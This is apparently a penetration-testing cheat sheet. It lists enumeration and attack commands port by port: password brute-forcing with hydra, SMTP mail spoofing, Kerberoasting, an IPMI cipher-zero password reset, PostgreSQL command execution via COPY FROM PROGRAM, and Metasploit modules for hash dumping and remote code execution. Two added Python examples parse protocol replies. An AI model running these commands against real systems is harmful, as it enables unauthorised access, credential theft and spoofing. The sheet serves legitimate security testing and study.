# Ports & Enumeration

FTP / Port 21:

```
ftp -a IP
ftp ftp://USER:PASS@IP
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 21 ftp://URL
```

SSH / Port 22:

```
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 22 SSH://URL
```

Telnet / Port 23:

```
nc -vv IP PORT
```

SMTP / Port 25:

```
nc -vv IP 25
EHLO HOSTNAME
# MAIL FROM must come before RCPT TO; a compliant server answers 503 otherwise
MAIL FROM: client@client.com
RCPT TO: brian@Fake.com
DATA
pwned
.

swaks -n -hr -f chris@example.org -t blah@nintendo.com -s smtpgw1.nintendo.com:25
```
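The manual exchange above only works if the envelope commands arrive in the order the server's state machine expects (EHLO, then MAIL FROM, then RCPT TO, then DATA). The following added example, which is not part of the original notes, implements that server-side state machine in a few lines and drives it with both a correctly ordered session and one that issues RCPT TO first, so the 503 "bad sequence" replies are visible. The hostnames and addresses are constructed placeholders.

```python
"""A minimal SMTP server-side state machine plus a client driver, showing the
command order the envelope exchange relies on.  Added example, not part of the
original notes; hostnames and addresses below are constructed placeholders."""

class MiniSmtpServer:
    """Tracks just enough state to answer the EHLO/MAIL/RCPT/DATA sequence."""

    def __init__(self, hostname="mx.example.test"):
        self.hostname = hostname
        self.helo = None
        self.sender = None
        self.rcpts = []
        self.in_data = False
        self.messages = []       # (sender, rcpts, body) for each accepted mail
        self._body = []

    def handle(self, line):
        """Return the reply for one client line (RFC 5321 reply codes), or None
        while body lines are being collected after DATA."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                self.messages.append((self.sender, list(self.rcpts), "\n".join(self._body)))
                self.sender, self.rcpts, self._body = None, [], []
                return "250 OK: queued"
            self._body.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("EHLO", "HELO"):
            self.helo = arg
            return f"250 {self.hostname}"
        if verb == "MAIL":
            if self.helo is None:
                return "503 Bad sequence: send EHLO first"
            self.sender = arg.partition(":")[2].strip()
            return "250 OK"
        if verb == "RCPT":
            if self.sender is None:
                return "503 Bad sequence: MAIL FROM required before RCPT TO"
            self.rcpts.append(arg.partition(":")[2].strip())
            return "250 OK"
        if verb == "DATA":
            if not self.rcpts:
                return "503 Bad sequence: no valid recipients"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 Bye"
        return "500 Command unrecognized"


def run_exchange(server, client_lines):
    """Feed client lines to the server; return the (line, reply) transcript."""
    transcript = []
    for line in client_lines:
        reply = server.handle(line)
        if reply is not None:
            transcript.append((line, reply))
    return transcript


# Constructed session in the correct order.
GOOD_SESSION = [
    "EHLO client.example.test",
    "MAIL FROM:<client@client.com>",
    "RCPT TO:<brian@Fake.com>",
    "DATA",
    "pwned",
    ".",
    "QUIT",
]

# Same commands with RCPT TO issued before MAIL FROM.
BAD_ORDER_SESSION = [
    "EHLO client.example.test",
    "RCPT TO:<brian@Fake.com>",
    "MAIL FROM:<client@client.com>",
    "DATA",
]

if __name__ == "__main__":
    for line, reply in run_exchange(MiniSmtpServer(), GOOD_SESSION):
        print(f"C: {line}\nS: {reply}")
```

Note that the out-of-order session never queues a message: the RCPT TO is rejected, and the later DATA is rejected because no recipient was accepted, which is exactly why a hand-typed test that starts with RCPT TO appears to "do nothing" against a real MTA.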

DNS / Port 53:

```
host -t axfr URL 
dnsrecon -d URL -t axfr
dnsenum URL
```

TFTP / Port 69:

```
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```

HTTP/HTTPS / Ports 80/8080/8000/443/8443:

```
nikto -host URL:PORT -C all 
feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt
gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive 
whatweb --color=never --no-errors -a 3 -v URL:PORT
wkhtmltoimage --format png URL:PORT OUTPUT.png
curl -sSikf URL:PORT/robots.txt
```

Kerberos / Port 88:

```
crackmapexec ldap IP --kerberoast 
```

POP3 / Port 110/995:

```
USER username
PASS password
LIST
RETR 1
```

IDENT / Port 113:

```
apt install ident-user-enum
ident-user-enum IP PORT-TO-QUERY
ident-user-enum IP 22 100000
```

RPC / Port 111/135:

```
rpcmap -U '' IP
rsysinfo 192.168.10.1
nmap -sSUC -p111 192.168.10.1
rusers -l 192.168.10.1
```

SMB / Ports 137-139/445:

```
smbmap -H IP 
smbclient '\\IP\' -L 
smbclient '\\IP\SHARE'
crackmapexec smb IP --shares 
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 445 SMB://URL
```

SNMP / Port 161:

```
snmp-check IP
snmpwalk -v 1 -c public 192.168.0.42
snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25

# Useful OIDs:
# .1.3.6.1.2.1.1.5            Hostname
# .1.3.6.1.4.1.77.1.4.2       Domain name
# .1.3.6.1.4.1.77.1.2.25      Usernames
# .1.3.6.1.4.1.77.1.2.3.1.1   Running services
# .1.3.6.1.4.1.77.1.2.27      Share information
```

LDAP / Port 389/636:

```
ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

GetADUsers.py DOMAIN/ -dc-ip IP -all | awk '{print $1}' | tee users.txt
GetNPUsers.py DOMAIN/ -dc-ip IP -usersfile users.txt
GetUserSPNs.py DOMAIN/ -dc-ip IP
GetUserSPNs.py hutch.offsec/ -dc-ip 192.168.76.122 -usersfile users.txt -request
Get-GPPPassword.py USER:PASS@IP
```

HTTPS / Port 443 (TLS checks):

```bash
# TLS extensions
openssl s_client -tlsextdebug -connect www.google.com:443
# TLS session resumption
sslyze --resum www.163.com:443
# TLS renegotiation
sslyze --reneg www.ibm.com:443
# certificate info
openssl s_client -connect www.google.com:443
# TLS compression
sslyze --compression www.google.com:443
# TLS fallback (downgrade protection)
openssl s_client -connect www.example.com:443 -no_tls1_2 -fallback_scsv
# known/compromised TLS keys
nmap -p443 --script ssl-known-key 192.168.0.15
```

Apple Filing Protocol (AFP) / Port 548:

```bash
# Nmap scripts:
nmap -p548 --script afp-ls,afp-path-vuln,afp-serverinfo,afp-showmount IP
# afp-ls           Lists available AFP volumes and files
# afp-path-vuln    Checks the AFP server for a known path-traversal vulnerability
# afp-serverinfo   Displays AFP server information
# afp-showmount    Lists AFP shares
```

IPMI / Port 623 (UDP):

```bash
# Metasploit modules
use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
use auxiliary/scanner/ipmi/ipmi_cipher_zero
# ipmitool over RMCP+ with cipher suite 0 (-C 0, the unauthenticated "cipher zero")
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123
```

RTSP / Port 554:

```
docker run -t ullaakut/cameradar
docker run -t ullaakut/cameradar -t 80.169.239.143 -p 554
```

Rsync / Port 873:

```
rsync -rdt rsync://IP:PORT
rsync -av USER@IP::FOLDER/ .
```

MSSQL / Port 1433:

```bash
# PowerUpSQL (PowerShell)
git clone https://github.com/NetSPI/PowerUpSQL
Import-Module ./PowerUpSQL.ps1
$user = "publicuser"
$pass = "GuestUserCantWrite1"
$i = "10.10.11.202,1433"
Invoke-SQLAudit -Verbose -Instance $i -Username $user -Password $pass

# Metasploit modules:
# Enumerate server configuration
mssql_enum
# Local privilege escalation
mssql_escalate_dbowner
mssql_escalate_execute_as
# Crawl available databases for useful content
mssql_findandsampledata
# Extract encrypted user password hashes
mssql_hashdump
# Search the database for interesting data
mssql_idf
# Add privileged local user accounts
mssql_local_auth_bypass
# Exploit linked database servers
mssql_linkcrawler
# Steal NTLM service credentials via SMB
mssql_ntlm_stealer
# Execute OS commands via xp_cmdshell
mssql_payload
# Extract the database schema
mssql_schemadump
# Load and execute SQL statements from a file
mssql_sql_file
```

Oracle Transparent Network Substrate (TNS) / Port 1521:

```bash
# Get the listener version
tnscmd10g version -h 10.11.21.25

# Useful tnscmd10g commands (tnscmd10g COMMAND -h IP):
# Ping the listener
ping
# Output the listener version and platform information
version
# Return the current status and variables used by the listener
status
# Dump service data
services
# Dump debugging information to the listener log
debug
# Reload the listener configuration file
reload
# Write the listener configuration file to a backup location
save_config
# Invoke listener shutdown
stop

# Metasploit:
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=TEST IP
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

# Authenticate with sqlplus:
# download and unzip the Oracle instant client
/opt/oracle/instantclient-basic-linux-XXXX.zip
/opt/oracle/instantclient-sqlplus-linux-XXXX.zip
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

# login (user/password@host:port/SID)
sqlplus perfstat/perfstat@10.11.21.20:1521/TEST
```

NFS / Port 2049:

```
showmount -e IP
mount -t nfs -o vers=2 -o nolock IP:/home /nfs
```

iSCSI / Port 3260:

```bash
nmap -p3260 --script iscsi-brute 192.168.56.5
```

MySQL / Port 3306:

```bash
# Metasploit modules:
# brute-force login
use auxiliary/scanner/mysql/mysql_login
# Return the basic configuration and server settings
mysql_enum
# Extract username and password hash values
mysql_hashdump
# Execute OS commands (Windows); see also mysql_start_up
mysql_payload
# Display the database schema
mysql_schemadump
# Execute arbitrary SQL statements
mysql_sql
```

ZeroMQ ZMTP (SaltStack) / Port 4505/4506:

```
# Metasploit module
use exploit/linux/misc/saltstack_salt_unauth_rce
```

SIP / Port 5060:

```bash
smap -o PBX
# enumerate potential SIP hosts
svmap.py 192.168.1.1/24
# user enumeration
svwar.py -e100-300 PBX-IP -m INVITE
# extract SIP digest authentications from a pcap into auth.txt
sipdump auth.txt -p auth.pcap
# crack the captured digests
sipcrack auth.txt -w wordlist.txt
# capture calls on the wire and write the audio out as WAV
ucsniff -i eth9 -T

# Metasploit
use auxiliary/sip_invite_spoof
```

PostgreSQL / Port 5432:

```bash
# brute-force users (Metasploit)
use auxiliary/scanner/postgres/postgres_login

# login
psql -h IP -U USER

# list databases
\list
# connect to a database
\c DATABASE
# list tables
\dt
SELECT usename, passwd FROM pg_shadow;
pg_dump --host=IP --username=USER --password --dbname=DB --table='TABLE' -f output_pgdump

# Code execution via COPY FROM PROGRAM (needs superuser or the pg_execute_server_program role)
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'CODE';
SELECT * FROM cmd_exec;

# Metasploit modules
# Execute arbitrary SQL statements
postgres_sql
# Extract username and password hash values
postgres_hashdump
# Display the database schema
postgres_schemadump
# Import a local file and display it (e.g., /etc/passwd)
postgres_readfile
# Load a shared object via pg_largeobject and create a UDF to execute arbitrary code on the server side
postgres_payload
```

Redis / Port 6379:

```bash
# connect (no password prompt when requirepass is unset)
redis-cli -h 109.206.167.35
# list keys
keys *
```

WSUS / Port 8530/8531:

```
SharpWSUS
pyWSUS
```

Memcached / Port 11211:

```bash
echo "version" | nc -vn -w 1 <IP> 11211      # Get version
echo "stats" | nc -vn -w 1 <IP> 11211        # Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211  # Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211  # Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211  # Get key names (the 0 means unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211  # Get saved value

# Metasploit:
use auxiliary/gather/memcached_extractor
```
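The memcached text protocol answers the `stats` and `stats cachedump` commands above with `STAT name value` and `ITEM key [size b; expiry s]` lines terminated by `END`. The added example below (not part of the original notes) parses both reply formats and summarises what an unauthenticated reader learns from an exposed instance: version, connection counts, items that never expire, and key names that look like session or credential material. The replies are constructed samples, not captured from a real server, and the `exposure_summary` helper and its keyword list are assumptions made for this example.

```python
"""Parse memcached text-protocol replies ("stats", "stats cachedump") so an
exposure review can be scripted.  Added example, not part of the original
notes; the replies below are constructed, not captured."""
import re

# Constructed reply to "stats" (only a few of the real fields are shown).
STATS_REPLY = """\
STAT pid 1
STAT uptime 86400
STAT version 1.6.21
STAT curr_connections 12
STAT total_connections 2077
STAT curr_items 3
STAT bytes 1488
END
"""

# Constructed reply to "stats cachedump 1 0".
CACHEDUMP_REPLY = """\
ITEM session:7f3a [128 b; 1700000000 s]
ITEM user:1001:email [34 b; 0 s]
ITEM csrf:ab12 [64 b; 1700003600 s]
END
"""

ITEM_RE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")

def parse_stats(reply):
    """Return {name: value} from a STAT/END reply; numeric values become ints."""
    stats = {}
    for line in reply.splitlines():
        if line == "END":
            break
        if not line.startswith("STAT "):
            raise ValueError(f"unexpected line: {line!r}")
        _, name, value = line.split(" ", 2)
        stats[name] = int(value) if value.isdigit() else value
    return stats

def parse_cachedump(reply):
    """Return [(key, size_bytes, expiry_epoch)] from a 'stats cachedump' reply;
    an expiry of 0 means the item never expires."""
    items = []
    for line in reply.splitlines():
        if line == "END":
            break
        m = ITEM_RE.match(line)
        if not m:
            raise ValueError(f"unexpected line: {line!r}")
        items.append((m[1], int(m[2]), int(m[3])))
    return items

def exposure_summary(stats, items):
    """Summarise what an unauthenticated reader learns (assumed heuristic:
    key names containing session/token/csrf/password-like words are flagged)."""
    sensitive = re.compile(r"session|token|csrf|passw|secret|cookie", re.I)
    return {
        "version": stats.get("version"),
        "current_connections": stats.get("curr_connections"),
        "items": len(items),
        "never_expire": [k for k, _, exp in items if exp == 0],
        "sensitive_keys": sorted(k for k, _, _ in items if sensitive.search(k)),
    }

if __name__ == "__main__":
    summary = exposure_summary(parse_stats(STATS_REPLY), parse_cachedump(CACHEDUMP_REPLY))
    for k, v in summary.items():
        print(f"{k}: {v}")
```

Feeding the output of the `nc` one-liners above into `parse_stats` and `parse_cachedump` turns a manual check into something that can run across an inventory; the key-name heuristic is deliberately simple and should be widened to whatever naming scheme the application under review uses.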

MongoDB / Port 27017:

```
mongo mongodb://USER:PASS@IP:PORT/
show dbs
use DB 
show tables 
db.TABLE.find()
```

gRPC / Port 50051:

```
https://github.com/fullstorydev/grpcui
https://github.com/fullstorydev/grpcurl
```
